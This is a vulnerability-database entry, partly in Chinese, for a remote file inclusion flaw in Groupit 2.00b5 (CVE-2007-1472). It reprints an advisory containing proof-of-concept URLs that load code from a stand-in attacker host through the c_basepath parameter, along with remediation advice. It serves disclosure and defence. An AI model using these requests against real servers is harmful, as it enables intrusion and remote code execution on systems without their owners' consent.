Groupit groupit.start.inc 变量重写漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112456 漏洞类型 代码注入
发布时间 2007-03-15 更新时间 2007-03-16
CVE编号 CVE-2007-1472 CNNVD-ID CNNVD-200703-394
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3486
https://www.securityfocus.com/bid/86557
https://cxsecurity.com/issue/WLB-2007030126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-394
|漏洞详情
Groupit2.00b5版本的groupit/base/groupit.start.inc中存在变量重写漏洞。远程攻击者可以借助写入到$_GLOBALS的参数,执行远程文件包含攻击和执行任意的PHP代码。比如使用提交到html/中的(1)content.php,(2)userprofile.php,(3)password.php,(4)dispatch.php和(5)deliver.php以及可能(6)load.inc.php和相关文件的c_basepath参数中的一个URL。
|漏洞EXP
-------------------------------------------------------------------------------------
[ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
-------------------------------------- ----------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : March, 15th 2007
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv75-theday-2007.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~

Application     : Groupit
version         : 2.00b5
URL             : http://fresh.t-systems-sfr.com/fresh/unix/src/privat2/groupit-2.00b5.tar.gz

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

- Invalid include function at html/content.php
-----------------------html/content.php------------

<?
...
include "$c_basepath/base/groupit.start.inc";

if (!empty($c_is_search))
{
  include "$c_basepath/modules/search/main.inc";
} else
{
  if ($c_is_section)
  {
     include  "$c_basepath/modules/content/section.inc";
  } else
  .........

include "$c_basepath/base/groupit.stop.inc";
?>
----------------------------------------------------------

Input passed to the "$c_basepath" parameter in load.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

also affected files :

html/userprofile.php
html/password.php
html/dispatch.php
html/deliver.php

and More ....



Proof Of Concept:
~~~~~~~~~~~

http://localhost/groupit/html/content.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/userprofile.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/password.php?c_basepath=http://atacker.com/inject.txt?

Solution:
~~~

- Sanitize variable $c_basepath affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
    EcHo Research & Development Center
    http://advisories.echo.or.id
    erdc[at]echo[dot]or[dot]id
    the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2007-03-15]
|受影响的产品
T-Systems Solutions for Research GmbH Groupit 2.00B5
|参考资料

来源:XF
名称:groupit-cbasepath-file-include(33000)
链接:http://xforce.iss.net/xforce/xfdb/33000
来源:BUGTRAQ
名称:20070315[ECHO_ADV_75$2007]Groupit2.00b5(c_basepath)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/462918/100/0/threaded
来源:MILW0RM
名称:3486
链接:http://www.milw0rm.com/exploits/3486
来源:VUPEN
名称:ADV-2007-0995
链接:http://www.frsirt.com/english/advisories/2007/0995
来源:VIM
名称:20070315[ECHO_ADV_75$2007]Groupit2.00b5(c_basepath)RemoteFileInclusionVulnerability
链接:http://www.attrition.org/pipermail/vim/2007-March/001436.html
来源:VIM
名称:20070315[ECHO_ADV_75$2007]Groupit2.00b5(c_basepath)RemoteFileInclusionVulnerability
链接:http://www.attrition.org/pipermail/vim/2007-March/001435.html
来源:SREASON
名称:2428
链接:http://securityreason.com/securityalert/2428
来源:OSVDB
名称:34476
链接:http://osvdb.org/34476